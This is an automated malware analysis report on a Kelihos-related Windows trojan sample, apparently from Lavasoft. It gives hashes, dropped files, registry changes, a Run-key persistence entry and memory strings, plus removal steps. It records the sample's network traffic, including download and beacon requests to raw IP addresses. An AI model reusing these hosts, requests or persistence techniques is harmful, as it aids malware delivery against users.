Trojan.Win32.Inject.aaybx (Kaspersky), Gen:Variant.Zusy.205305 (B) (Emsisoft), Gen:Variant.Zusy.205305 (AdAware), Backdoor.Win32.Kelihos.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: c63f82eb2281e2749945a1956ea88d1e
SHA1: c3c193ae0f5d60cb34657c0a33d785896c562608
SHA256: 0a3c2de15e17a3547a93c61d8b95ee5dedd4a2f4d6a8e1a73f30767cf99f907e
SSDeep: 3072:zWkf02fLFiUYbN7VnY70MR1Ueo1cyzivsLBXw:ykRfBiUON7RYwMrlUbNXw
Size: 110402 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2016-08-30 09:47:37
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:704
%original file name%.exe:716
temp1613017254.exe:408
The Trojan injects its code into the following process(es):
temp1613017254.exe:1076
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\temp1613017254.exe (5442 bytes)
The process temp1613017254.exe:1076 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmp.exe (0 bytes)
Registry activity
The process %original file name%.exe:704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 4C 65 4F 37 1D BB 77 6F CB 8F 5F 09 F8 69 4C"
The process %original file name%.exe:716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 C9 89 ED 3A CE 1F 41 B1 29 76 B6 7D E1 54 CA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process temp1613017254.exe:1076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 94 01 65 8D D8 FB C3 EE 17 6A F1 5A 19 F0 C5"
[HKCU\Software\Microsoft\Notepad]
"SizeCompletedValid" = "DAqs6LMSkogN294CNi9SS2pnNSTJn3PzmP v9UYGf/4AICblETLQS1T96Ci4DQj4eQ=="
[HKCU\Software\Sysinternals\Process Monitor]
"UrlEnabledUse" = "80"
[HKLM\System\CurrentControlSet\Services\nm\Parameters]
"EnableStationQueries" = "1"
"ComputerName" = "XP7"
[HKCU\Software\Microsoft\Notepad]
"InfoPlayedCurrent" = "00 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"DBSavedUse" = "A2 49 4D F3 D9 1E 9F 88 01 01 08 6A 00 03 98 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Sysinternals\Process Monitor]
"FlagsModifiedValid" = "00 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Notepad]
"StyleModifiedPrev" = "80"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"PlatformCompressedValid" = "00 00 00 00 00 00 00 00"
"PersistentLocalizedName" = "CB 80 F9 7F 7A 92 E2 AE 4A E9 9E 3D 21 85 B5 92"
[HKCU\Software\Sysinternals\Process Monitor]
"DefaultCompressedRecord" = "CB 80 F9 7F 73 B0 96 97 A5 6D BA E1 E2 08 86 E7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Notepad]
"ActiveModifiedTheme" = "CB 80 F9 7F 87 E1 B4 EE C3 B9 D7 46 28 5C D8 5E"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"RecordEnabledCheck" = "80"
[HKCU\Software\Sysinternals\Process Monitor]
"RecordModifiedMax" = "DAqs6LMSkogN294CNi9SS2pnNSTJn3PzmP v9UYGf/4AICblETLQS1T96Ci4DQj4eQ=="
[HKLM\System\CurrentControlSet\Services\nm\Parameters]
"UserName" = "%CurrentUserName%"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"LineLoadedQuick" = "DAqs6LMSkogN294CNi9SS2pnNSTJn3PzmP v9UYGf/4AICblETLQS1T96Ci4DQj4eQ=="
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetworkChecker" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\temp1613017254.exe"
The process temp1613017254.exe:408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
Dropped PE files
MD5 | File path |
---|---|
3353a9c88fcd77ed1bebae124b65beb4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\temp1613017254.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:704
%original file name%.exe:716
temp1613017254.exe:408 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\temp1613017254.exe (5442 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetworkChecker" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\temp1613017254.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 31702 | 32768 | 3.90163 | 34cba9b044ea2361fe8decdb4dd2f4f9 |
.rda | 36864 | 3049 | 4096 | 2.00959 | e34b57e2f529a2291a1dcefc4113a147 |
.data | 40960 | 577 | 4096 | 0.418623 | 53a6ec818c2bad848cb617cb887f0d7e |
.ida | 45056 | 3047 | 4096 | 3.03522 | aca78db13f3eda332808891c936edbb6 |
.rsrc | 49152 | 2272 | 4096 | 1.30331 | fc83d57640df09d44455480ea91c8d29 |
.reloc | 53248 | 1853 | 4096 | 2.21907 | 915194c4e62a60b03de6669744081d07 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 19
f238a12e3ef0310c61f24f5a5e245208
f6a6b221f41fc8283a810a5e8e9a66e5
99564cb5dedc1d51ebcfa470d6723cc8
23428d92527c8e919baa63597bec1c75
824de34d33cb78b1e3b0e26b3d48f5d0
da4b169e389a845046ddac26b3b73f35
7702db5880df216b0cc3f724cd49c9b4
354bde16801b6ded8ca4bce3da0f1dbe
949531905417445acff9757cc331d2fb
8146a109171433a12f297233fac87d4c
4c6477776f1df4b6d6fcf2755dd9f638
265f9c827098ef01026b4dae9762a4d8
e190833272f1403b5caeb1d05c39838e
db17f4845e35e685d86cb7e35a5d1d01
c07b1245ea7a25860476d237810b0925
28bb1befcf537a8c2aedd0ab7bb94b61
3b16b2a04caef1ff2e1399a0cd92e000
b3cf9d60876ba42586710a8043cfb74c
3616f6837505f09a1b60ab9d013e3bdb
Network Activity
URLs
URL | IP |
---|---|
hxxp://193.28.179.40/omydarl.exe | |
hxxp://95.104.39.96/online.htm | |
hxxp://95.104.39.96/setup.htm |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /omydarl.exe HTTP/1.0
Host: 193.28.179.40
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Wed, 21 Sep 2016 19:35:04 GMT
Content-Type: application/octet-stream
Content-Length: 1088759
Connection: close
Last-Modified: Wed, 21 Sep 2016 19:21:09 GMT
ETag: "57e2dda5-109cf7"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z.V............|'...;...$...;...$...;.......;.......;...;..C;...$...;...$...;..8=...;..Rich.;..........PE..L....,.W.....................P......f............. ..................................................................................................................................................................................................text....{.......................... ..`.rdata..............................@..@.data...A...........................@....idata..............................@....rsrc...............................@..@.reloc..=...........................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<< skipped >>>
...0lUUE..H@..B@...n........0F.A...F.9Z7..v%......D\W}..)i..6..(.m..D.>...d..\.......2.vY..j...e_...\=.....`M......b...b..4.../@....$./w....j]lV.a.......!....c.....
}..0.UUE.@....5x...1...Y.#@.cTW..A.....1u.m4....sE.hd...... ....XE."*......b....F....d.p..~3.M.a. ..../=Wh!..'..k.BH0..rf.E...p#.>...H....>..~......q.. !......_^...|..U..uv....0}.........D1@.....yCI..h)...w.}.@A.....<..}...Q...O3.".;..v.
..
GET /online.htm HTTP/1.1
Host: 95.104.39.96
Content-Length: 164
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
.. DlUUE..H@.TC..Nr.O2&.|.qE0F.A..!...^..#].....D.mi.7.?j.".......3......&O. q....hU..L....[C.H-.....i1.>.*...Z.!.HdK...[...4U..C..N.t...%}1..r..I...t.f.y..}...>F.
HTTP/1.1 200
Server: Apache
Content-Length: 229
Content-Type:
Last-Modified: .., 21 ... 2016 19:35:28 GMT
Accept-Ranges: bytes
Server:nginx/1.2.6
Date:Wed, 21 Sep 2016 19:35:33 GMT
Last-Modified:Wed, 21 Sep 2016 19:35:33 GMT
Accept-Ranges:bytes
GET /setup.htm HTTP/1.1
Host: 95.104.39.96
Content-Length: 1912
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)
.O...ts...s.s.s.v.s......K..........V..rn...1.E....!.....1..L'..n....F......{.8...j..F...C.G{. 1......a........t...&....,...*5.}........V..........;Q..y...`i.....'..(%c..`r}.......1...EH..Uo.'d...C...z.%1.h..v.C...#....'........V.....Q...;&(........)r....,a.j..bU....6.~/....k..Z\#.nJ...c.'Zk...A......<..a........Lx...b[..l.....R.....>......kH K>.c.;.$..G.....z@j.l......q.5.<j.[3w..C..}.N....}d...:me...._]b..
..../)...QZ...;cs.
P.....q.i..v..,..d.s)70.....;h.....}RF...P8..#_..tVt;nL(....w......5.q..~.....Z (..|..&...Dll..3.~.....\..P"Xqt.d..}<3...s..J..=e.1....)Th...*.$...<.Z..?H..>B......j..iudo:..q%.......I.-Q..S&V.^d.`........D..=~..L$;X..u@I.b...Z....X.e... .$>..?..1a.G...A.4...{.>h..DJ.0.V...(....t>.]z:#..\nB.".Y_...r=...Xjl3*%m@[.........?$d.H..=.....q.}...@.L.....
m..a..J.Z..{.%..a.U]P..a.u>........jv.]6.Nk.q._...#E.....x...(J7...5/.I;MI..`Q.5...54m'}..ARE..p.e.... DT.....=.u ..%._.<.}o..f|. A...v.....w.\..g~c.m;@....(-A|.'.=..e.ZG......5f.C7.{...B..u...".G.g..G.-....h.....@z.....6.a......p....P...W<..>?I...3E
...!.!sX(....K.m.o.........;&U[#...d.g.w.....d8.*.@1.j.'.S..-._..=....xcO<.....$..;.W...)6...".F%.
...,....j...z...
*.#.K$(wS.........L...,..!.q.?sT...$.@..3.c..>2.M......w7D..f.........5.%"..=L..o~*X...-rh.Yx....yw..d..b....lM`m.....Np.;.
HTTP/1.1 200
Server: Apache
Content-Length: 34895
Content-Type:
Last-Modified: .., 21 ... 2016 19:35:29 GMT
Accept-Ranges: bytes
Server:nginx/1.2.6
Date:Wed, 21 Sep 2016 19:35:34 GMT
Last-Modified:Wed, 21 Sep 2016 19:35:34 GMT
Accept-Ranges:bytes
$.4."Y.....P.H.......)&.V...<H.Tz.XT.L*~v...1..L'..n....Fh2....6rb4.Qkm.&..T..|._....b".\...._}...;u.7.N..B....(.V....._:.F.W.S}.n....#d5i:....G.H.} .RM4C.3. ....Z:......Q.......*...u...=..X~..kG...\....)o...^!U.NN.?...Y...p..... A....}..z..,.?.;".N<.P......#...E..(|.Q..P...pH.O.|.MC5.....~.:'.t..H.e.e...:....\.O....J.V:..9@..w...<e...N.z...p.a..*.1.M.....=..M....f..Z...#.r..q._X.C....[..8."....:.. R.._...... ./..........J..bM.r...$2?6E..p.v.%.N.!.|-.....e..6.H...~.H?"Wn.c.'6..s..... .x-R7xT.A...."V...g....`..zmC.....".W..s..%..........Q........$qB..L. o....b..K...O.S.n]]s ...#...d.c[...9...;o.....D.".. .4.c6-E..(.aM.i.Nwmz.]..bs@'&{.......#]...?...@..C.......dAu..f.<Q.......:..~.<.V9..l......!&...&.B..u.|....2...g.Zpo.'........e.&...y5......w{.F...,A....o...[Q.h.]SDU.O^.....`Z..... 9s..X...G..6..s,.q.........h.c.....c.......TJ.$."ty.k.-E.x.j..tU...o...o...I.......&.dZ.E.PdD......m`..D ..#........h..C..X....H..~..o.u..F(............!....e....u......Z.YWu;.a.C..Ez.Ax........#......A.vt*xr#...4..5..m.....}Gb5...1........L.C..P(...!u..W}>.:42...&..c........).M..... .".a%.1...-..6..20E...SZ..W....2....V....f......uq.w*.....WS..9..f..,b...=N2.aL-..}......IK.v..W...F..<..)....3......g'....%.XA.........E.<.4.....)|...p...xpbs.Q......p./.....4..$X..O.....h...)0.q......3k.sG..~(@d.n.9....Np.L..B.s."9..h``.....GT....p..|C...F..h...x....... 2.wx...?.t6p..z.c...L.`....'l.`........i(.A..r.T&Dk}...<..?.b...W..Tx8........u,.....O....y.a...8.......d8H.677....}.w....t.z.^..,..E....../....W..:.D......
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
temp1613017254.exe_1076:
FTPQ
FTPQ
PSSSSSSh
PSSSSSSh
FTPS
FTPS
~$)~()|$
~$)~()|$
3|$83|$0
3|$83|$0
3|$
3|$
3|$@3|$4
3|$@3|$4
.QZ^&
.QZ^&
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Can't terminate a sub-expression with an alternation operator |.
Can't terminate a sub-expression with an alternation operator |.
A regular expression can start with the alternation operator |.
A regular expression can start with the alternation operator |.
Alternation operators are not allowed inside a DEFINE block.
Alternation operators are not allowed inside a DEFINE block.
More than one alternation operator | was encountered inside a conditional expression.
More than one alternation operator | was encountered inside a conditional expression.
A repetition operator cannot be applied to a zero-width assertion.
A repetition operator cannot be applied to a zero-width assertion.
Invalid alternation operators within (?...) block.
Invalid alternation operators within (?...) block.
The \c and \C escape sequences are not supported by POSIX basic regular expressions: try the Perl syntax instead.
The \c and \C escape sequences are not supported by POSIX basic regular expressions: try the Perl syntax instead.
Found a closing repetition operator } with no corresponding {.
Found a closing repetition operator } with no corresponding {.
The repeat operator " " cannot start a regular expression.
The repeat operator " " cannot start a regular expression.
The repeat operator "?" cannot start a regular expression.
The repeat operator "?" cannot start a regular expression.
The repeat operator "*" cannot start a regular expression.
The repeat operator "*" cannot start a regular expression.
right-curly-bracket
right-curly-bracket
left-curly-bracket
left-curly-bracket
0123456789
0123456789
Unmatched quantified repeat operator { or \{.
Unmatched quantified repeat operator { or \{.
Invalid preceding regular expression prior to repetition operator.
Invalid preceding regular expression prior to repetition operator.
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
boost::filesystem::directory_iterator::operator
boost::filesystem::directory_iterator::operator
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
login
login
Mozilla/5.0 (Windows NT 5.1) Gecko/20100101 Firefox/14.0 Opera/12.0
Mozilla/5.0 (Windows NT 5.1) Gecko/20100101 Firefox/14.0 Opera/12.0
Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00
Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00
Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00
Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14
Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14
Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14
Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; da-dk) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; da-dk) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3
Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)
Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)
Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 5.0; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 5.0; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0
Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0
Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130401 Firefox/21.0
Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130401 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130328 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130328 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130330 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130330 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130401 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130401 Firefox/21.0
Mozilla/5.0 (Windows NT 6.2; rv:21.0) Gecko/20130326 Firefox/21.0
Mozilla/5.0 (Windows NT 6.2; rv:21.0) Gecko/20130326 Firefox/21.0
Mozilla/5.0 (X11; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (X11; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0
Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0
Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36
Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36
Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)
Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)
asio.misc
asio.misc
asio.misc error
asio.misc error
thread.entry_event
thread.entry_event
thread.exit_event
thread.exit_event
255.255.255.255
255.255.255.255
0.0.0.0
0.0.0.0
127.0.0.1
127.0.0.1
%d.%m.%Y %H:%M:%S
%d.%m.%Y %H:%M:%S
%a, %d %b %Y %H:%M:%S GMT
%a, %d %b %Y %H:%M:%S GMT
(3-!0,1'8"5.*2$
(3-!0,1'8"5.*2$
.text
.text
h.rdata
h.rdata
H.data
H.data
.rsrc
.rsrc
B.reloc
B.reloc
DriverEntry: TCP-IP not found, quitting.
DriverEntry: TCP-IP not found, quitting.
DriverEntry: Adapters not found in the registry, try to copy the bindings of TCP-IP.
DriverEntry: Adapters not found in the registry, try to copy the bindings of TCP-IP.
DriverEntry: OS Version: %d.%d
DriverEntry: OS Version: %d.%d
Device %d = %ws
Device %d = %ws
Status of %x querying key value
Status of %x querying key value
Status of %x querying key value for size
Status of %x querying key value for size
OpenKey Failed, %d!
OpenKey Failed, %d!
Key name=%ws
Key name=%ws
Status of %x opening %ws
Status of %x opening %ws
Mac %u = %ws
Mac %u = %ws
Tcpip bind value not REG_MULTI_SZ but %u
Tcpip bind value not REG_MULTI_SZ but %u
Querying key value result len = %u but previous len = %u
Querying key value result len = %u but previous len = %u
IoCreateDevice status = %x
IoCreateDevice status = %x
NPF_IoControl: BIOCQUERYOID completed, BytesWritten = %u
NPF_IoControl: BIOCQUERYOID completed, BytesWritten = %u
NPF_IoControl: Bogus return from NdisRequest (query): Bytes Written (%u) > InfoBufferLength (%u)!!
NPF_IoControl: Bogus return from NdisRequest (query): Bytes Written (%u) > InfoBufferLength (%u)!!
NPF_IoControl: BIOCSETOID completed, BytesRead = %u
NPF_IoControl: BIOCSETOID completed, BytesRead = %u
